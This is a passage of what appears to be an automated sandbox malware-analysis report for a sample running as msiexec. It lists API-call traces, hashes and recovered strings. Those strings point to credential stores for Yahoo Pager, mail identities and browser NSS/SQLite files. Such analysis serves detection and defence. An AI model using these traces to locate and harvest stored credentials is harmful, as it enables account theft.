                                                                                                            • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy
                                                                                                            • String ID: @
                                                                                                            • API String ID: 3510742995-2766056989
                                                                                                            • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                            • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                            • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                            • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _strcmpi
                                                                                                            • String ID: C@$mail.identity
                                                                                                            • API String ID: 1439213657-721921413
                                                                                                            • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                            • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                            • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                            • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 00444573
                                                                                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: QueryValuememset
                                                                                                            • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                            • API String ID: 3363972335-1703613266
                                                                                                            • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                                            • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                            • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                                            • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 00406640
                                                                                                              • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                              • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                              • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                            • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                            • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy$memset$memcmp
                                                                                                            • String ID: Ul@
                                                                                                            • API String ID: 270934217-715280498
                                                                                                            • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                            • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                            • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                            • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                            APIs
                                                                                                              • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                              • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                            • sprintf.MSVCRT ref: 0040B929
                                                                                                            • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                              • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                              • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                            • sprintf.MSVCRT ref: 0040B953
                                                                                                            • _mbscat.MSVCRT ref: 0040B966
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 203655857-0
                                                                                                            • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                                            • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                                                            • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                                            • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                                                            APIs
                                                                                                              • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                            Strings
                                                                                                            • recovered %d pages from %s, xrefs: 004188B4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                            • String ID: recovered %d pages from %s
                                                                                                            • API String ID: 985450955-1623757624
                                                                                                            • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                            • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                                            • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                            • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _ultoasprintf
                                                                                                            • String ID: %s %s %s
                                                                                                            • API String ID: 432394123-3850900253
                                                                                                            • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                            • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                            • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                            • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 00409919
                                                                                                            • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendmemset
                                                                                                            • String ID: N\@
                                                                                                            • API String ID: 568519121-3851889168
                                                                                                            • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                                            • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                                                                                                            • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                                            • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                                                                                                            APIs
                                                                                                            • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                            • sprintf.MSVCRT ref: 0040909B
                                                                                                              • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                              • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                              • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                              • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                              • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                            • String ID: menu_%d
                                                                                                            • API String ID: 1129539653-2417748251
                                                                                                            • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                            • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                            • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                            • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _msizerealloc
                                                                                                            • String ID: failed memory resize %u to %u bytes
                                                                                                            • API String ID: 2713192863-2134078882
                                                                                                            • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                            • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                            • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                            • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                                            APIs
                                                                                                              • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                                            • strrchr.MSVCRT ref: 00409808
                                                                                                            • _mbscat.MSVCRT ref: 0040981D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName_mbscatstrrchr
                                                                                                            • String ID: _lng.ini
                                                                                                            • API String ID: 3334749609-1948609170
                                                                                                            • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                            • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                                            • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                            • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                                            APIs
                                                                                                            • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                              • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                              • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                            • _mbscat.MSVCRT ref: 004070FA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _mbscat$_mbscpystrlen
                                                                                                            • String ID: sqlite3.dll
                                                                                                            • API String ID: 1983510840-1155512374
                                                                                                            • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                            • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                            • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                            • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                            APIs
                                                                                                            • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PrivateProfileString
                                                                                                            • String ID: A4@$Server Details
                                                                                                            • API String ID: 1096422788-4071850762
                                                                                                            • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                            • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                            • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                            • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                            APIs
                                                                                                            • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                                            • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                                            • memset.MSVCRT ref: 0042C932
                                                                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy$memset
                                                                                                            • String ID:
                                                                                                            • API String ID: 438689982-0
                                                                                                            • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                            • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                                            • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                            • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                                            APIs
                                                                                                            • strlen.MSVCRT ref: 0040849A
                                                                                                            • memset.MSVCRT ref: 004084D2
                                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,68147B60,?,00000000), ref: 0040858F
                                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,68147B60,?,00000000), ref: 004085BA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3110682361-0
                                                                                                            • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                            • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                            • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                            • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                            APIs
                                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                            • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3510742995-0
                                                                                                            • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                            • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                            • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                            • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                                            APIs
                                                                                                              • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099A3
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099CC
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099ED
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 00409A0E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??2@$memset
                                                                                                            • String ID:
                                                                                                            • API String ID: 1860491036-0
                                                                                                            • Opcode ID: 53a709b0ebb70c131a26b1f3e55d335129ca60e454a525cf22a7fedf29ded436
                                                                                                            • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                                                                                            • Opcode Fuzzy Hash: 53a709b0ebb70c131a26b1f3e55d335129ca60e454a525cf22a7fedf29ded436
                                                                                                            • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                                                                            APIs
                                                                                                            • strlen.MSVCRT ref: 0040797A
                                                                                                            • free.MSVCRT ref: 0040799A
                                                                                                              • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                              • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                              • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                            • free.MSVCRT ref: 004079BD
                                                                                                            • memcpy.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,0044357F,00000000,?,?,00000000,0044386F,?,?), ref: 004079DD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: free$memcpy$mallocstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3669619086-0
                                                                                                            • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                            • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                                                            • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                            • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59